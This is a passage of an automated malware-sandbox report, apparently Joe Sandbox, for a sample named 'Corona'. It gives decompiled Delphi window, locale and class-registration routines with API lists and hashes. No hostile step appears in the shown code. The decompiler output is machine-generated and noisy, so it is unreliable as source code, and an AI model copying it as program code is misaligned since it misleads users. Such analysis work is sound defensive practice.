                                  									__eflags = 0;
                                  								}
                                  								__eflags = _t278;
                                  								if(_t278 < 0) {
                                  									_t278 = 0;
                                  									__eflags = 0;
                                  								}
                                  								_t328 = _t278;
                                  								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  								_t281 = _v8;
                                  								__eflags =  *((char*)(_t281 + 0x57));
                                  								if( *((char*)(_t281 + 0x57)) != 0) {
                                  									E004483B4(_v8, _t328);
                                  								}
                                  							}
                                  						}
                                  						 *((char*)(_v8 + 0x230)) = 0;
                                  						if( *((char*)(_v8 + 0x22f)) != 1) {
                                  							ShowWindow(E00434EF4(_v8),  *(0x450c94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4)); // executed
                                  						} else {
                                  							if( *(_v8 + 0x22b) != 2) {
                                  								ShowWindow(E00434EF4(_v8),  *(0x450c94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                  								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                  								__eflags = _t220;
                                  								CallWindowProcA(0x40628c, E00434EF4(_v8), 5, 0, _t220);
                                  								E0042EA44();
                                  							} else {
                                  								_t231 = E00434EF4(_v8);
                                  								_t232 =  *0x452bb0; // 0x2131714
                                  								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                  								ShowWindow(E00434EF4(_v8), 3);
                                  							}
                                  							_t226 =  *0x452bb0; // 0x2131714
                                  							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                  						}
                                  					}
                                  				}
                                  				_pop(_t331);
                                  				 *[fs:eax] = _t331;
                                  				_push(0x44a4ac);
                                  				_t154 = _v8;
                                  				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                  				return _t154;
                                  			}

                                  APIs
                                  • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 0044A2D9
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID: 6D
                                  • API String ID: 1946433856-480018528
                                  • Opcode ID: 8d6b6d8c45d6b2b3b563bcc4ef862751e939b853effc402ed7082f167f1b366c
                                  • Instruction ID: e4e10800a61aa60a658af10784f0615aae17927e59931d47e97f2c5840a4eab5
                                  • Opcode Fuzzy Hash: 8d6b6d8c45d6b2b3b563bcc4ef862751e939b853effc402ed7082f167f1b366c
                                  • Instruction Fuzzy Hash: 43F14B34A40244EFEB00DFA9CA85B9E77F4BB49304F1540B6E5009B362D779EE10DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 396 4051e8-405219 lstrcpyn GetThreadLocale GetLocaleInfoA 397 405302-405309 396->397 398 40521f-405223 396->398 399 405225-405229 398->399 400 40522f-405245 lstrlen 398->400 399->397 399->400 401 405248-40524b 400->401 402 405257-40525f 401->402 403 40524d-405255 401->403 402->397 405 405265-40526a 402->405 403->402 404 405247 403->404 404->401 406 405294-405296 405->406 407 40526c-405292 lstrcpyn LoadLibraryExA 405->407 406->397 408 405298-40529c 406->408 407->406 408->397 409 40529e-4052ce lstrcpyn LoadLibraryExA 408->409 409->397 410 4052d0-405300 lstrcpyn LoadLibraryExA 409->410 410->397
                                  C-Code - Quality: 61%
                                  			E004051E8() {
                                  				void* _t28;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t36;
                                  				struct HINSTANCE__* _t42;
                                  				char* _t51;
                                  				void* _t52;
                                  				struct HINSTANCE__* _t59;
                                  				void* _t61;
                                  
                                  				_push(0x105);
                                  				_push( *((intOrPtr*)(_t61 - 4)));
                                  				_push(_t61 - 0x11d);
                                  				L00401294();
                                  				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                  				_t59 = 0;
                                  				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                  					L14:
                                  					return _t59;
                                  				} else {
                                  					_t28 = _t61 - 0x11d;
                                  					_push(_t28);
                                  					L0040129C();
                                  					_t51 = _t28 + _t61 - 0x11d;
                                  					L5:
                                  					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                  						_t51 = _t51 - 1;
                                  						goto L5;
                                  					}
                                  					_t30 = _t61 - 0x11d;
                                  					if(_t51 != _t30) {
                                  						_t52 = _t51 + 1;
                                  						if( *((char*)(_t61 - 0x12)) != 0) {
                                  							_push(0x105 - _t52 - _t30);
                                  							_push(_t61 - 0x12);
                                  							_push(_t52);
                                  							L00401294();
                                  							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                  						}
                                  						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                  							_push(0x105 - _t52 - _t61 - 0x11d);
                                  							_push(_t61 - 0xd);
                                  							_push(_t52);
                                  							L00401294();
                                  							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                  							_t59 = _t36;
                                  							if(_t59 == 0) {
                                  								 *((char*)(_t61 - 0xb)) = 0;
                                  								_push(0x105 - _t52 - _t61 - 0x11d);
                                  								_push(_t61 - 0xd);
                                  								_push(_t52);
                                  								L00401294();
                                  								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                  								_t59 = _t42;
                                  							}
                                  						}
                                  					}
                                  					goto L14;
                                  				}
                                  			}

                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004051F8
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405205
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040520B
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405236
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040527D
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040528D
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004052B5
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004052C5
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004052EB
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004052FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: e7ccf738e9fc140108c117ea55436e3f1c143f05186227db9b8c309b92f3d244
                                  • Instruction ID: 3797dba1763956ffeb98ffb0881f4edfccbc60eb60ba4fedcf152278796cf33b
                                  • Opcode Fuzzy Hash: e7ccf738e9fc140108c117ea55436e3f1c143f05186227db9b8c309b92f3d244
                                  • Instruction Fuzzy Hash: F8316671E0065D6AEF25D5B8DC8ABEF67AC9B04344F0401FBA604F61C1D67C9E448F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 696 432908-432919 697 432933-43293b 696->697 698 43291b 696->698 701 432941-432949 697->701 702 432a16-432a1f call 42ef48 697->702 699 43298d-43299a call 42fa58 698->699 700 43291d-432920 698->700 718 432a64-432a6a 699->718 721 4329a0-4329cc call 406760 call 42e338 call 4327e0 699->721 704 432922-432923 700->704 705 432954-43295f call 444fdc 700->705 706 43294f 701->706 707 4329de-4329e9 call 432874 701->707 702->718 724 432a21 702->724 711 432925-432928 704->711 712 43297e-432982 704->712 713 432a5b-432a5f call 42fa58 705->713 725 432965-432973 705->725 706->713 707->713 727 4329eb-4329ef 707->727 722 432a23-432a33 call 434ef4 GetCapture 711->722 723 43292e 711->723 712->718 719 432988 712->719 713->718 719->713 721->718 746 4329d2-4329d9 721->746 722->713 733 432a35-432a3c 722->733 723->713 724->713 725->718 736 432979 725->736 727->718 730 4329f1-4329fa call 435154 727->730 730->718 741 4329fc-432a14 call 434ef4 NtdllDefWindowProc_A 730->741 733->713 737 432a3e-432a46 733->737 736->713 737->713 740 432a48-432a56 call 42f98c 737->740 740->713 741->718 746->718
                                  C-Code - Quality: 91%
                                  			E00432908(void* __eax, intOrPtr* __edx) {
                                  				char _v20;
                                  				char _v28;
                                  				intOrPtr _t17;
                                  				void* _t19;
                                  				void* _t21;
                                  				void* _t23;
                                  				void* _t32;
                                  				void* _t39;
                                  				void* _t45;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				void* _t50;
                                  				void* _t51;
                                  				intOrPtr* _t65;
                                  				intOrPtr* _t67;
                                  				void* _t68;
                                  
                                  				_t67 = __edx;
                                  				_t50 = __eax;
                                  				_t17 =  *__edx;
                                  				_t68 = _t17 - 0x84;
                                  				if(_t68 > 0) {
                                  					_t19 = _t17 + 0xffffff00 - 9;
                                  					if(_t19 < 0) {
                                  						_t21 = E0042EF48(__eax);
                                  						if(_t21 != 0) {
                                  							L28:
                                  							return _t21;
                                  						}
                                  						L27:
                                  						_t23 = E0042FA58(_t50, _t67); // executed
                                  						return _t23;
                                  					}
                                  					if(_t19 + 0xffffff09 - 0xb < 0) {
                                  						_t21 = E00432874(__eax, _t51, __edx);
                                  						if(_t21 == 0) {
                                  							goto L27;
                                  						}
                                  						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                                  							goto L28;
                                  						}
                                  						_t21 = E00435154(_t50);
                                  						if(_t21 == 0) {
                                  							goto L28;
                                  						}
                                  						_push( *((intOrPtr*)(_t67 + 8)));
                                  						_push( *((intOrPtr*)(_t67 + 4)));
                                  						_push( *_t67);
                                  						_t32 = E00434EF4(_t50);
                                  						_push(_t32);
                                  						L00406294();
                                  						return _t32;
                                  					}
                                  					goto L27;
                                  				}
                                  				if(_t68 == 0) {
                                  					_t21 = E0042FA58(__eax, __edx);
                                  					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                  						goto L28;
                                  					}
                                  					E00406760( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                  					E0042E338(_t50,  &_v28,  &_v20);
                                  					_t21 = E004327E0(_t50, 0,  &_v28, 0);
                                  					if(_t21 == 0) {
                                  						goto L28;
                                  					}
                                  					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                                  					return _t21;
                                  				}
                                  				_t39 = _t17 - 7;
                                  				if(_t39 == 0) {
                                  					_t65 = E00444FDC(__eax);
                                  					if(_t65 == 0) {
                                  						goto L27;
                                  					}
                                  					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
                                  					if(_t21 == 0) {
                                  						goto L28;
                                  					}
                                  					goto L27;
                                  				}
                                  				_t21 = _t39 - 1;
                                  				if(_t21 == 0) {
                                  					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                  						goto L28;
                                  					}
                                  				} else {
                                  					if(_t21 == 0x17) {
                                  						_t45 = E00434EF4(__eax);
                                  						if(_t45 == GetCapture() &&  *0x450a94 != 0) {
                                  							_t47 =  *0x450a94; // 0x0
                                  							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                  								_t48 =  *0x450a94; // 0x0
                                  								E0042F98C(_t48, 0, 0x1f, 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-3916222277
                                  • Opcode ID: 2a0c31bde393de02a88b991aeff239c8a9a427775593c96d6b30ca319d01d185
                                  • Instruction ID: fb4889188739837e9bc115331c27bfaff8f64b720a9803afb2c6392ae9c02ced
                                  • Opcode Fuzzy Hash: 2a0c31bde393de02a88b991aeff239c8a9a427775593c96d6b30ca319d01d185
                                  • Instruction Fuzzy Hash: 1A318E313003428BDA34BA3D8B85B1B73D55B48314F14B93BB49AC7796DABCDD0A8B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0044CEA8(intOrPtr _a4) {
                                  				intOrPtr _t26;
                                  
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                  				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                  				_push(_t26); // executed
                                  				L00406294(); // executed
                                  				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                  				return _t26;
                                  			}

                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0044CED2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: 6dd4715fa70d21bc755ed0328dafae5a048de240b919829fb05e7bc1f4fafafb
                                  • Instruction ID: 9c238bd4b901fe08f225174a94e8842f97e48cad97f7cd3834223a09c594c5ea
                                  • Opcode Fuzzy Hash: 6dd4715fa70d21bc755ed0328dafae5a048de240b919829fb05e7bc1f4fafafb
                                  • Instruction Fuzzy Hash: D5F0C579205608AFDB40DF9DD588D4AFBE8BB4C260B058595B988CB321D234FD81CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00439B30(void* __ebx, void* __edi, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _v28;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _t25;
                                  				char _t29;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t53;
                                  				struct HINSTANCE__* _t63;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t83;
                                  				void* _t87;
                                  
                                  				_v20 = 0;
                                  				_v8 = 0;
                                  				_push(_t87);
                                  				_push(0x439ca8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t87 + 0xffffffe0;
                                  				_v16 = GetCurrentProcessId();
                                  				_v12 = 0;
                                  				E00408938("Delphi%.8X", 0,  &_v16,  &_v8);
                                  				E00403EA0(0x452b20, _v8);
                                  				_t25 =  *0x452b20; // 0x2131290
                                  				 *0x452b1c = GlobalAddAtomA(E0040430C(_t25));
                                  				_t29 =  *0x452664; // 0x400000
                                  				_v36 = _t29;
                                  				_v32 = 0;
                                  				_v28 = GetCurrentThreadId();
                                  				_v24 = 0;
                                  				E00408938("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                  				E00403EA0(0x452b24, _v20);
                                  				_t35 =  *0x452b24; // 0x21312ac
                                  				 *0x452b1e = GlobalAddAtomA(E0040430C(_t35));
                                  				_t38 =  *0x452b24; // 0x21312ac
                                  				 *0x452b28 = RegisterClipboardFormatA(E0040430C(_t38));
                                  				 *0x452b60 = E0041390C(1);
                                  				E00439734();
                                  				 *0x452b10 = E0043955C(1, 1);
                                  				_t47 = E0044B5C4(1, __edi);
                                  				_t78 =  *0x451104; // 0x452bb4
                                  				 *_t78 = _t47;
                                  				_t49 = E0044C6A8(0, 1);
                                  				_t80 =  *0x450fc8; // 0x452bb0
                                  				 *_t80 = _t49;
                                  				_t50 =  *0x450fc8; // 0x452bb0
                                  				E0044E290( *_t50, 1);
                                  				_t53 =  *0x429690; // 0x429694
                                  				E004130C0(_t53, 0x42b8f4, 0x42b904);
                                  				_t63 = GetModuleHandleA("USER32");
                                  				if(_t63 != 0) {
                                  					 *0x4509d0 = GetProcAddress(_t63, "AnimateWindow");
                                  				}
                                  				_pop(_t83);
                                  				 *[fs:eax] = _t83;
                                  				_push(0x439caf);
                                  				E00403E4C( &_v20);
                                  				return E00403E4C( &_v8);
                                  			}

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00439CA8), ref: 00439B51
                                  • GlobalAddAtomA.KERNEL32 ref: 00439B84
                                  • GetCurrentThreadId.KERNEL32 ref: 00439B9F
                                  • GlobalAddAtomA.KERNEL32 ref: 00439BD5
                                  • RegisterClipboardFormatA.USER32 ref: 00439BEB
                                    • Part of subcall function 0041390C: RtlInitializeCriticalSection.KERNEL32(00411448,?,?,0041A3D5,00000000,0041A3F9), ref: 0041392B
                                    • Part of subcall function 00439734: SetErrorMode.KERNEL32(00008000), ref: 0043974D
                                    • Part of subcall function 00439734: GetModuleHandleA.KERNEL32(USER32,00000000,0043989A,?,00008000), ref: 00439771
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0043977E
                                    • Part of subcall function 00439734: LoadLibraryA.KERNEL32(imm32.dll,00000000,0043989A,?,00008000), ref: 0043979A
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004397BC
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004397D1
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004397E6
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004397FB
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00439810
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00439825
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0043983A
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0043984F
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00439864
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00439879
                                    • Part of subcall function 00439734: SetErrorMode.KERNEL32(?,004398A1,00008000), ref: 00439894
                                    • Part of subcall function 0044B5C4: GetKeyboardLayout.USER32(00000000), ref: 0044B609
                                    • Part of subcall function 0044B5C4: 72E7AC50.USER32(00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B65E
                                    • Part of subcall function 0044B5C4: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B668
                                    • Part of subcall function 0044B5C4: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000), ref: 0044B673
                                    • Part of subcall function 0044C6A8: LoadIconA.USER32(00400000,MAINICON), ref: 0044C78D
                                    • Part of subcall function 0044C6A8: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C7BF
                                    • Part of subcall function 0044C6A8: OemToCharA.USER32(?,?), ref: 0044C7D2
                                    • Part of subcall function 0044C6A8: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C812
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 00439C6F
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00439C80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                  • API String ID: 2159221912-1126952177
                                  • Opcode ID: 15589a11e17b17599333cdc4bee61945cb1601364e99a8bb7522e29f288597ce
                                  • Instruction ID: c0984a276cde33582f5d26c7d9a167d02d8ef6303a66a86fbacce81158fd6b66
                                  • Opcode Fuzzy Hash: 15589a11e17b17599333cdc4bee61945cb1601364e99a8bb7522e29f288597ce
                                  • Instruction Fuzzy Hash: 69413174A003459FCB01EFA5D942A9E77F5EB49309B50553BE404E73A2DBB8AE00CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 42%
                                  			E0044C9B0(void* __eax, void* __ebx, void* __ecx) {
                                  				struct _WNDCLASSA _v44;
                                  				char _v48;
                                  				char* _t22;
                                  				long _t23;
                                  				CHAR* _t26;
                                  				struct HINSTANCE__* _t27;
                                  				intOrPtr* _t29;
                                  				signed int _t32;
                                  				intOrPtr* _t33;
                                  				signed int _t36;
                                  				struct HINSTANCE__* _t37;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct HWND__* _t41;
                                  				char* _t47;
                                  				char* _t52;
                                  				long _t55;
                                  				long _t59;
                                  				struct HINSTANCE__* _t62;
                                  				intOrPtr _t64;
                                  				void* _t69;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t83;
                                  				short _t88;
                                  
                                  				_v48 = 0;
                                  				_t69 = __eax;
                                  				_push(_t83);
                                  				_push(0x44cb51);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t83 + 0xffffffd4;
                                  				if( *((char*)(__eax + 0xa4)) != 0) {
                                  					L13:
                                  					_pop(_t77);
                                  					 *[fs:eax] = _t77;
                                  					_push(0x44cb58);
                                  					return E00403E4C( &_v48);
                                  				}
                                  				_t22 =  *0x451028; // 0x452048
                                  				if( *_t22 != 0) {
                                  					goto L13;
                                  				}
                                  				_t23 = E0041A128(E0044CF30, __eax); // executed
                                  				 *(_t69 + 0x40) = _t23;
                                  				 *0x450d08 = L00406294;
                                  				_t26 =  *0x450d28; // 0x44c698
                                  				_t27 =  *0x452664; // 0x400000
                                  				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                  					_t62 =  *0x452664; // 0x400000
                                  					 *0x450d14 = _t62;
                                  					_t88 = RegisterClassA(0x450d04);
                                  					if(_t88 == 0) {
                                  						_t64 =  *0x450dd4; // 0x41a46c
                                  						E0040597C(_t64,  &_v48);
                                  						E0040B1B8(_v48, 1);
                                  						E00403888();
                                  					}
                                  				}
                                  				_t29 =  *0x450e7c; // 0x4528f8
                                  				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_t33 =  *0x450e7c; // 0x4528f8
                                  				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_push(_t36);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t37 =  *0x452664; // 0x400000
                                  				_push(_t37);
                                  				_push(0);
                                  				_t7 = _t69 + 0x8c; // 0x20c00044
                                  				_t39 = E0040430C( *_t7);
                                  				_t40 =  *0x450d28; // 0x44c698, executed
                                  				_t41 = E004067F4(_t40, _t39); // executed
                                  				 *(_t69 + 0x30) = _t41;
                                  				_t9 = _t69 + 0x8c; // 0x444b24
                                  				E00403E4C(_t9);
                                  				 *((char*)(_t69 + 0xa4)) = 1;
                                  				_t11 = _t69 + 0x40; // 0x10940000
                                  				_t12 = _t69 + 0x30; // 0xe
                                  				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                  				_t47 =  *0x450ef0; // 0x452b14
                                  				if( *_t47 != 0) {
                                  					_t55 = E0044D634(_t69);
                                  					_t13 = _t69 + 0x30; // 0xe
                                  					SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                  					_t59 = E0044D634(_t69);
                                  					_t14 = _t69 + 0x30; // 0xe
                                  					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
                                  				}
                                  				_t15 = _t69 + 0x30; // 0xe
                                  				_t70 = GetSystemMenu( *_t15, "true");
                                  				DeleteMenu(_t70, 0xf030, 0);
                                  				DeleteMenu(_t70, 0xf000, 0);
                                  				_t52 =  *0x450ef0; // 0x452b14
                                  				if( *_t52 != 0) {
                                  					DeleteMenu(_t70, 0xf010, 0);
                                  				}
                                  				goto L13;
                                  			}

                                  APIs
                                    • Part of subcall function 0041A128: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A146
                                  • GetClassInfoA.USER32 ref: 0044CA0F
                                  • RegisterClassA.USER32 ref: 0044CA27
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  • SetWindowLongA.USER32 ref: 0044CAC3
                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 0044CAE5
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CAF8
                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB03
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB12
